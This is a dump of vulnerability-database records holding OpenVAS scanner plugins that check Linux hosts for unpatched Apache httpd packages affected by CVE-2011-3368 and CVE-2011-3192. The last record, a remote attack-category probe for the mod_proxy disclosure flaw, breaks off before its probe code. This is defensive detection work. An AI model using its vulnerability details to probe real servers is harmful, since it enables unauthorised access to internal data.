script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.0.1.el6_1.3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:55:32", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881032", "href": "http://plugins.openvas.org/nasl.php?oid=881032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"httpd on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_id(881032);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:07:44", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:881436", "href": "http://plugins.openvas.org/nasl.php?oid=881436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_id(881436);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:27", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870505", "href": "http://plugins.openvas.org/nasl.php?oid=870505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_id(870505);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:56", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881020", "href": "http://plugins.openvas.org/nasl.php?oid=881020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"httpd on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\");\n script_id(881020);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 i386\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881020", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881020\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-05-12T17:32:44", "description": "Apache HTTP Server is prone to an information disclosure\n vulnerability.", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "openvas", "title": "Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103293", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103293", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103293\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(49957, 50802);\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_tag(name:\"creation_date\", value:\"2011-10-11 17:46:33 +0200 (Tue, 11 Oct 2011)\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49957\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP Server is prone to an information disclosure\n vulnerability.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to gain access to sensitive\n information.\");\n\n script_tag(name:\"solution\", value:\"The vendor released an update. Please see the references for details.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", 